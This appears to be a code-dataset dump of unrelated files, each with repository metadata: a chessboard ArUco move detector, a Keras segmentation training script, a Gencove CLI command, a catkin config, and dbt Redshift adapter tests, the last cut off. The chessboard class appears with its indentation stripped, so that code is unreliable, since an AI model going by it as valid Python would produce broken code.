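    ys = [p[1] for p in corners]
    return [int(sum(xs) / 4), int(sum(ys) / 4)]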
| 31.472313
| 161
| 0.477541
|
import numpy as np
import time
from aruco_detect import detectCode
from aruco_detect import detectCode2
import matplotlib.image as mpimg
import matplotlib.pyplot as plt
import skimage.feature as sk
class Match:
def __init__(self):
self.board = self.createBoard()
def position(self, corners):
print (corners)
x = min(corners[0][0],corners[1][0],corners[2][0],corners[3][0])
y = min(corners[0][1],corners[2][1],corners[1][1],corners[3][1])
center = [int(x), int(y)]
for i in range (0,8):
row = self.board[i]
for j in range (0,8):
square1 = row[j]
print(center[0],square1[0][0], square1[1][0])
print(center[1], square1[0][1], square1[1][1])
if ((center[0] > square1[0][0]) and (center[0] < square1[1][0])):
if((center[1] > square1[0][1]) and (center[1] < square1[1][1])):
currentSquare = square1[2]
return currentSquare
def createBoard(self):
colMax = 41
rowMax = 338
topL = [colMax,rowMax]
botR = [121,415]
topLi = topL
botRi = botR
board = []
A = [[topL,botR,'A1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
A.append((xtopL,xbotR,('A'+ str(i))))
topLi = xtopL
botRi = xbotR
topL2 = [topL[0],topL[1] + (botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + (botR[1]-topL[1])]
topLi = topL2
botRi = botR2
board.append(A)
B = [[topL2,botR2,'B1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
B.append((xtopL,xbotR,('B'+ str(i))))
board.append(B)
topL2 = [topL[0],topL[1] + 2*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 2*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
C = [[topL2,botR2,'C1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
C.append((xtopL,xbotR,('C'+ str(i))))
board.append(C)
topL2 = [topL[0],topL[1] + 3*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 3*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
D = [[topL2,botR2,'D1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
D.append((xtopL,xbotR,('D'+ str(i))))
board.append(D)
topL2 = [topL[0],topL[1] + 4*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 4*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
E = [[topL2,botR2,'E1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
E.append((xtopL,xbotR,('E'+ str(i))))
board.append(E)
topL2 = [topL[0],topL[1] + 5*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 5*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
F = [[topL2,botR2,'F1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
F.append((xtopL,xbotR,('F'+ str(i))))
board.append(F)
topL2 = [topL[0],topL[1] + 6*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 6*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
G = [[topL2,botR2,'G1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
G.append((xtopL,xbotR,('G'+ str(i))))
board.append(G)
topL2 = [topL[0],topL[1] + 7*(botR[1]-topL[1])]
botR2 = [botR[0],botR[1] + 7*(botR[1]-topL[1])]
topLi = topL2
botRi = botR2
H = [[topL2,botR2,'H1']]
for i in range (2,9):
xtopL = [botRi[0],topLi[1]]
xbotR = [botRi[0]+ (botRi[0]-topLi[0]),botRi[1]]
topLi = xtopL
botRi = xbotR
H.append((xtopL,xbotR,('H'+ str(i))))
board.append(H)
return board
def genDiffs(self):
currentSquare = ''
square_ids = []
changes = []
ids1, previousState = detectCode()
ids2, currentState = detectCode2()
idsPrev = ids1
idsCurr = ids2
ids1 = ids1.astype(int)
ids1 = ids1.ravel()
ids1.sort()
ids2 = ids2.astype(int)
ids2 = ids2.ravel()
ids2.sort()
if (len(previousState) == len(currentState)):
for i in range(0, len(previousState)):
                if (previousState[i][0] != currentState[i][0]).any():
pos1 = self.position(previousState[i][0])
pos2 = self.position(currentState[i][0])
changes.append((idsPrev[i],pos1,pos2))
else:
pass
else:
for i in range (0,len(ids1)):
currentID = ids1[i]
j = 0
f = 0
for j in range (0,len(ids2)):
if currentID == ids2[j]:
f = 1
                        if (previousState[np.where(idsPrev == currentID)[0]][0] != currentState[np.where(idsCurr == currentID)[0]][0]).any():
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])
pos2 = self.position(currentState[np.where(idsCurr == (currentID))[0]][0])
changes.append((currentID,pos1,pos2))
else:
j += 1
if f == 0:
print(currentID)
pos1 = self.position(previousState[np.where(idsPrev == (currentID))[0]][0])
pos2 = '_'
changes.append((currentID,pos1,pos2))
print(changes)
| true
| true
|
1c3e8580a517f6f1347979a29bbe093e7db77cb0
| 3,627
|
py
|
Python
|
train.py
|
ChmarsLuo/Charms-Semantic-Segmentation-Models
|
4a8cdf82a218c3d3e1c8d10ef6a9118c8e6f3f89
|
[
"Apache-2.0"
] | 5
|
2021-03-09T22:56:03.000Z
|
2021-06-18T12:20:34.000Z
|
train.py
|
ChmarsLuo/Charms-Semantic-Segmentation-Models
|
4a8cdf82a218c3d3e1c8d10ef6a9118c8e6f3f89
|
[
"Apache-2.0"
] | null | null | null |
train.py
|
ChmarsLuo/Charms-Semantic-Segmentation-Models
|
4a8cdf82a218c3d3e1c8d10ef6a9118c8e6f3f89
|
[
"Apache-2.0"
] | 1
|
2021-01-23T08:32:46.000Z
|
2021-01-23T08:32:46.000Z
|
from data import *
from keras.models import load_model
import os
import numpy as np
import keras
from keras.optimizers import *
from lr.lr import scheduler
from keras.losses import binary_crossentropy, categorical_crossentropy
from models import MobileNext
from keras.callbacks import ModelCheckpoint, TensorBoard,\
LearningRateScheduler, EarlyStopping, ReduceLROnPlateau, CSVLogger
########################################################################################################################
if __name__ == '__main__':
batch_size = 1
epochs = 30
# prepare model
model = MobileNext()
model.summary()
# load weights
BASE_WEIGHT_PATH = ('https://github.com/fchollet/deep-learning-models/'
'releases/download/v0.6/')
model_name = 'mobilenet_%s_%d_tf_no_top.h5' % ('1_0', 224)
    weight_path = BASE_WEIGHT_PATH + model_name  # BASE_WEIGHT_PATH already ends with '/'; a backslash here would corrupt the download URL
weights_path = keras.utils.get_file(model_name, weight_path)
model.load_weights(weights_path, by_name=True, skip_mismatch=True)
# train and val path
train_im_path,train_mask_path = './data/build/train/images/','./data/build/train/labels/'
val_im_path,val_mask_path = './data/build/val/images/','./data/build/val/labels/'
train_set = os.listdir(train_im_path)
val_set = os.listdir(val_im_path)
train_number = len(train_set)
val_number = len(val_set)
train_root = './data/build/train/'
val_root = './data/build/val/'
# data aug and generator
data_gen_args = dict(rotation_range=0.2,
width_shift_range=0.05,
height_shift_range=0.05,
shear_range=0.05,
zoom_range=0.05,
horizontal_flip=True,
fill_mode='nearest')
training_generator = trainGenerator(batch_size,train_root,'images','labels',data_gen_args,
image_save_data_dir = None,
mask_save_data_dir = None
)
validation_generator = trainGenerator(batch_size,val_root,'images','labels',data_gen_args,
image_save_data_dir=None,
mask_save_data_dir=None,
)
model_path ="./logs/"
model_name = 'build_{epoch:03d}.h5'
model_file = os.path.join(model_path, model_name)
model_checkpoint = ModelCheckpoint(model_file, monitor='val_loss', verbose=1, save_best_only=True, mode='auto')
lr_reducer = ReduceLROnPlateau(monitor='val_loss', factor=np.sqrt(0.5625), cooldown=0, patience=5, min_lr=0.5e-6)
model.compile(loss=binary_crossentropy,
optimizer=Adam(lr=1e-3),
metrics=['accuracy'])
callable = [EarlyStopping(monitor='val_loss', patience=10, verbose=1, mode='auto'),
model_checkpoint,
lr_reducer,
                CSVLogger(filename='./logs/log.csv', append=False), # CSVLogger writes the per-epoch training log to CSV - very handy
TensorBoard(log_dir='./logs/')]
model.fit_generator(generator=training_generator,
validation_data=validation_generator,
steps_per_epoch=train_number//batch_size,
validation_steps=val_number//batch_size,
use_multiprocessing=False,
epochs=epochs,verbose=1,
initial_epoch = 0,
callbacks=callable)
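# --- Illustrative note, not part of the original script ---
# `scheduler` is imported from lr.lr above but never attached to the callbacks. If it is an
# epoch -> learning-rate function (an assumption about that module), it would normally be
# wired in through the LearningRateScheduler callback that is already imported, e.g.:
#
#     callable.append(LearningRateScheduler(scheduler, verbose=1))
#
# A typical step-decay schedule of that shape, shown only for illustration:
def example_step_decay(epoch, initial_lr=1e-3, drop=0.5, epochs_per_drop=10):
    """Halve the learning rate every `epochs_per_drop` epochs (illustrative only)."""
    return initial_lr * (drop ** (epoch // epochs_per_drop))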
| 44.231707
| 121
| 0.570168
|
from data import *
from keras.models import load_model
import os
import keras
from keras.optimizers import *
from lr.lr import scheduler
from keras.losses import binary_crossentropy, categorical_crossentropy
from models import MobileNext
from keras.callbacks import ModelCheckpoint, TensorBoard,\
LearningRateScheduler, EarlyStopping, ReduceLROnPlateau, CSVLogger
| true
| true
|
1c3e86182db408ba7ef54aa9b065e364e0d389b0
| 660
|
py
|
Python
|
gencove/command/s3_imports/autoimports/autoimport_list/cli.py
|
gncv/gencove-cli
|
b4bcbe5b6a1506544472542af8b2384d21c7cbe4
|
[
"Apache-2.0"
] | 1
|
2020-04-28T06:31:53.000Z
|
2020-04-28T06:31:53.000Z
|
gencove/command/s3_imports/autoimports/autoimport_list/cli.py
|
gncv/gencove-cli
|
b4bcbe5b6a1506544472542af8b2384d21c7cbe4
|
[
"Apache-2.0"
] | null | null | null |
gencove/command/s3_imports/autoimports/autoimport_list/cli.py
|
gncv/gencove-cli
|
b4bcbe5b6a1506544472542af8b2384d21c7cbe4
|
[
"Apache-2.0"
] | 1
|
2021-07-29T08:24:51.000Z
|
2021-07-29T08:24:51.000Z
|
"""Project autoimport from S3 URI shell command definition.
"""
import click
from gencove.command.common_cli_options import add_options, common_options
from gencove.constants import Credentials, Optionals
from .main import S3AutoImportList
@click.command("list")
@add_options(common_options)
def autoimport_list(
host,
email,
password,
api_key,
):
"""Lists S3 automatic import jobs.
Examples:
List S3 automatic import jobs:
gencove s3 autoimports list
""" # noqa: E501
S3AutoImportList(
Credentials(email=email, password=password, api_key=api_key),
Optionals(host=host),
).run()
| 20.625
| 74
| 0.701515
|
import click
from gencove.command.common_cli_options import add_options, common_options
from gencove.constants import Credentials, Optionals
from .main import S3AutoImportList
@click.command("list")
@add_options(common_options)
def autoimport_list(
host,
email,
password,
api_key,
):
S3AutoImportList(
Credentials(email=email, password=password, api_key=api_key),
Optionals(host=host),
).run()
| true
| true
|
1c3e86a43c2a0d5672cd50f8c9ca4f8573b62144
| 376
|
py
|
Python
|
DiRa_Software/Reference/Source code final 2018-2019/LHU_The_Walker_Digital_race_2019/build/lhucds/detect/thoi_cds/lhu_odometry/catkin_generated/pkg.installspace.context.pc.py
|
lamhoangtung/DiRa
|
6e92f465c0197f3bd60b1e5719c1cc8fa06c5e4c
|
[
"MIT"
] | 34
|
2019-05-07T08:44:27.000Z
|
2020-05-26T13:52:32.000Z
|
DiRa_Software/Reference/Source code final 2018-2019/LHU_The_Walker_Digital_race_2019/build/lhucds/detect/thoi_cds/lhu_odometry/catkin_generated/pkg.installspace.context.pc.py
|
giangnt071098/DiRa
|
71da5c9f13f3fb32d4cc1efd96d981139fb66ee5
|
[
"MIT"
] | 3
|
2019-10-21T04:37:48.000Z
|
2019-11-11T12:16:04.000Z
|
DiRa_Software/Reference/Source code final 2018-2019/LHU_The_Walker_Digital_race_2019/build/lhucds/detect/thoi_cds/lhu_odometry/catkin_generated/pkg.installspace.context.pc.py
|
giangnt071098/DiRa
|
71da5c9f13f3fb32d4cc1efd96d981139fb66ee5
|
[
"MIT"
] | 58
|
2019-03-13T09:15:15.000Z
|
2021-11-19T08:32:27.000Z
|
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "lhu_odometry"
PROJECT_SPACE_DIR = "/home/nvidia/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| 41.777778
| 68
| 0.707447
|
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "lhu_odometry"
PROJECT_SPACE_DIR = "/home/nvidia/catkin_ws/install"
PROJECT_VERSION = "0.0.0"
| true
| true
|
1c3e86ef476debf19f99be68c61128b0c63c8b2c
| 14,045
|
py
|
Python
|
tests/unit/test_redshift_adapter.py
|
dlb8685/dbt-redshift
|
c1f02a1931ad6bd9cf0c2eb28bee9bf9e7da3dcf
|
[
"Apache-2.0"
] | 18
|
2021-10-03T09:15:30.000Z
|
2022-03-31T20:32:12.000Z
|
tests/unit/test_redshift_adapter.py
|
dlb8685/dbt-redshift
|
c1f02a1931ad6bd9cf0c2eb28bee9bf9e7da3dcf
|
[
"Apache-2.0"
] | 42
|
2021-10-05T17:03:10.000Z
|
2022-03-31T14:26:25.000Z
|
tests/unit/test_redshift_adapter.py
|
dlb8685/dbt-redshift
|
c1f02a1931ad6bd9cf0c2eb28bee9bf9e7da3dcf
|
[
"Apache-2.0"
] | 10
|
2021-11-02T13:16:26.000Z
|
2022-03-29T07:44:24.000Z
|
import unittest
from unittest import mock
from unittest.mock import Mock
import agate
import boto3
from dbt.adapters.redshift import (
RedshiftAdapter,
Plugin as RedshiftPlugin,
)
from dbt.clients import agate_helper
from dbt.exceptions import FailedToConnectException
from .utils import config_from_parts_or_dicts, mock_connection, TestAdapterConversions, inject_adapter
@classmethod
def fetch_cluster_credentials(*args, **kwargs):
return {
'DbUser': 'root',
'DbPassword': 'tmp_password'
}
class TestRedshiftAdapter(unittest.TestCase):
def setUp(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self._adapter = None
@property
def adapter(self):
if self._adapter is None:
self._adapter = RedshiftAdapter(self.config)
inject_adapter(self._adapter, RedshiftPlugin)
return self._adapter
def test_implicit_database_conn(self):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_database_conn(self):
self.config.method = 'database'
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_iam_conn(self):
self.config.credentials = self.config.credentials.replace(
method='iam',
cluster_id='my_redshift',
iam_duration_seconds=1200
)
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
expected_creds = self.config.credentials.replace(password='tmp_password')
self.assertEqual(creds, expected_creds)
def test_iam_conn_optionals(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'port': 5439,
'schema': 'public',
'method': 'iam',
'cluster_id': 'my_redshift',
'db_groups': ["my_dbgroup"],
'autocreate': True,
}
},
'target': 'test'
}
config_from_parts_or_dicts(self.config, profile_cfg)
def test_invalid_auth_method(self):
# we have to set method this way, otherwise it won't validate
self.config.credentials.method = 'badmethod'
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue('badmethod' in context.exception.msg)
def test_invalid_iam_no_cluster_id(self):
self.config.credentials = self.config.credentials.replace(method='iam')
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue("'cluster_id' must be provided" in context.exception.msg)
def test_default_session_is_not_used_when_iam_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method='iam')
self.config.credentials.cluster_id = 'clusterid'
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_default_session_is_not_used_when_iam_not_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method=None)
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_cancel_open_connections_empty(self):
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_master(self):
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections[key] = mock_connection('master')
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_single(self):
master = mock_connection('master')
model = mock_connection('model')
model.handle.get_backend_pid.return_value = 42
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections.update({
key: master,
1: model,
})
with mock.patch.object(self.adapter.connections, 'add_query') as add_query:
query_result = mock.MagicMock()
add_query.return_value = (None, query_result)
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 1)
add_query.assert_called_once_with('select pg_terminate_backend(42)')
master.handle.get_backend_pid.assert_not_called()
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_default_keepalive(self, psycopg2):
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=240,
application_name='dbt'
)
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_changed_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=256)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=256,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options="-c search_path=test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path_with_space(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options=r"-c search_path=test\ test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_set_zero_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=0)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
application_name='dbt')
def test_dbname_verification_is_case_insensitive(self):
# Override adapter settings from setUp()
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'Redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self.adapter.cleanup_connections()
self._adapter = RedshiftAdapter(self.config)
self.adapter.verify_database('redshift')
class TestRedshiftAdapterConversions(TestAdapterConversions):
def test_convert_text_type(self):
rows = [
['', 'a1', 'stringval1'],
['', 'a2', 'stringvalasdfasdfasdfa'],
['', 'a3', 'stringval3'],
]
agate_table = self._make_table_of(rows, agate.Text)
expected = ['varchar(64)', 'varchar(2)', 'varchar(22)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_text_type(agate_table, col_idx) == expect
def test_convert_number_type(self):
rows = [
['', '23.98', '-1'],
['', '12.78', '-2'],
['', '79.41', '-3'],
]
agate_table = self._make_table_of(rows, agate.Number)
expected = ['integer', 'float8', 'integer']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_number_type(agate_table, col_idx) == expect
def test_convert_boolean_type(self):
rows = [
['', 'false', 'true'],
['', 'false', 'false'],
['', 'false', 'true'],
]
agate_table = self._make_table_of(rows, agate.Boolean)
expected = ['boolean', 'boolean', 'boolean']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_boolean_type(agate_table, col_idx) == expect
def test_convert_datetime_type(self):
rows = [
['', '20190101T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190102T01:01:01Z', '2019-01-01 01:01:01'],
['', '20190103T01:01:01Z', '2019-01-01 01:01:01'],
]
agate_table = self._make_table_of(rows, [agate.DateTime, agate_helper.ISODateTime, agate.DateTime])
expected = ['timestamp without time zone', 'timestamp without time zone', 'timestamp without time zone']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_datetime_type(agate_table, col_idx) == expect
def test_convert_date_type(self):
rows = [
['', '2019-01-01', '2019-01-04'],
['', '2019-01-02', '2019-01-04'],
['', '2019-01-03', '2019-01-04'],
]
agate_table = self._make_table_of(rows, agate.Date)
expected = ['date', 'date', 'date']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_date_type(agate_table, col_idx) == expect
def test_convert_time_type(self):
# dbt's default type testers actually don't have a TimeDelta at all.
agate.TimeDelta
rows = [
['', '120s', '10s'],
['', '3m', '11s'],
['', '1h', '12s'],
]
agate_table = self._make_table_of(rows, agate.TimeDelta)
expected = ['varchar(24)', 'varchar(24)', 'varchar(24)']
for col_idx, expect in enumerate(expected):
assert RedshiftAdapter.convert_time_type(agate_table, col_idx) == expect
# convert_boolean_type
# convert_datetime_type
# convert_date_type
# convert_time_type
| 38.165761
| 146
| 0.61068
|
import unittest
from unittest import mock
from unittest.mock import Mock
import agate
import boto3
from dbt.adapters.redshift import (
RedshiftAdapter,
Plugin as RedshiftPlugin,
)
from dbt.clients import agate_helper
from dbt.exceptions import FailedToConnectException
from .utils import config_from_parts_or_dicts, mock_connection, TestAdapterConversions, inject_adapter
@classmethod
def fetch_cluster_credentials(*args, **kwargs):
return {
'DbUser': 'root',
'DbPassword': 'tmp_password'
}
class TestRedshiftAdapter(unittest.TestCase):
def setUp(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'pass': 'password',
'port': 5439,
'schema': 'public'
}
},
'target': 'test'
}
project_cfg = {
'name': 'X',
'version': '0.1',
'profile': 'test',
'project-root': '/tmp/dbt/does-not-exist',
'quoting': {
'identifier': False,
'schema': True,
},
'config-version': 2,
}
self.config = config_from_parts_or_dicts(project_cfg, profile_cfg)
self._adapter = None
@property
def adapter(self):
if self._adapter is None:
self._adapter = RedshiftAdapter(self.config)
inject_adapter(self._adapter, RedshiftPlugin)
return self._adapter
def test_implicit_database_conn(self):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_database_conn(self):
self.config.method = 'database'
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(creds, self.config.credentials)
def test_explicit_iam_conn(self):
self.config.credentials = self.config.credentials.replace(
method='iam',
cluster_id='my_redshift',
iam_duration_seconds=1200
)
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
creds = RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
expected_creds = self.config.credentials.replace(password='tmp_password')
self.assertEqual(creds, expected_creds)
def test_iam_conn_optionals(self):
profile_cfg = {
'outputs': {
'test': {
'type': 'redshift',
'dbname': 'redshift',
'user': 'root',
'host': 'thishostshouldnotexist',
'port': 5439,
'schema': 'public',
'method': 'iam',
'cluster_id': 'my_redshift',
'db_groups': ["my_dbgroup"],
'autocreate': True,
}
},
'target': 'test'
}
config_from_parts_or_dicts(self.config, profile_cfg)
def test_invalid_auth_method(self):
self.config.credentials.method = 'badmethod'
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue('badmethod' in context.exception.msg)
def test_invalid_iam_no_cluster_id(self):
self.config.credentials = self.config.credentials.replace(method='iam')
with self.assertRaises(FailedToConnectException) as context:
with mock.patch.object(RedshiftAdapter.ConnectionManager, 'fetch_cluster_credentials', new=fetch_cluster_credentials):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertTrue("'cluster_id' must be provided" in context.exception.msg)
def test_default_session_is_not_used_when_iam_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method='iam')
self.config.credentials.cluster_id = 'clusterid'
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_default_session_is_not_used_when_iam_not_used(self):
boto3.DEFAULT_SESSION = Mock()
self.config.credentials = self.config.credentials.replace(method=None)
with mock.patch('dbt.adapters.redshift.connections.boto3.Session'):
RedshiftAdapter.ConnectionManager.get_credentials(self.config.credentials)
self.assertEqual(boto3.DEFAULT_SESSION.client.call_count, 0,
"The redshift client should not be created using the default session because the session object is not thread-safe")
def test_cancel_open_connections_empty(self):
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_master(self):
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections[key] = mock_connection('master')
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 0)
def test_cancel_open_connections_single(self):
master = mock_connection('master')
model = mock_connection('model')
model.handle.get_backend_pid.return_value = 42
key = self.adapter.connections.get_thread_identifier()
self.adapter.connections.thread_connections.update({
key: master,
1: model,
})
with mock.patch.object(self.adapter.connections, 'add_query') as add_query:
query_result = mock.MagicMock()
add_query.return_value = (None, query_result)
self.assertEqual(len(list(self.adapter.cancel_open_connections())), 1)
add_query.assert_called_once_with('select pg_terminate_backend(42)')
master.handle.get_backend_pid.assert_not_called()
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_default_keepalive(self, psycopg2):
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=240,
application_name='dbt'
)
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_changed_keepalive(self, psycopg2):
self.config.credentials = self.config.credentials.replace(keepalives_idle=256)
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
keepalives_idle=256,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
psycopg2.connect.assert_called_once_with(
dbname='redshift',
user='root',
host='thishostshouldnotexist',
password='password',
port=5439,
connect_timeout=10,
options="-c search_path=test",
keepalives_idle=240,
application_name='dbt')
@mock.patch('dbt.adapters.postgres.connections.psycopg2')
def test_search_path_with_space(self, psycopg2):
self.config.credentials = self.config.credentials.replace(search_path="test test")
connection = self.adapter.acquire_connection('dummy')
psycopg2.connect.assert_not_called()
connection.handle
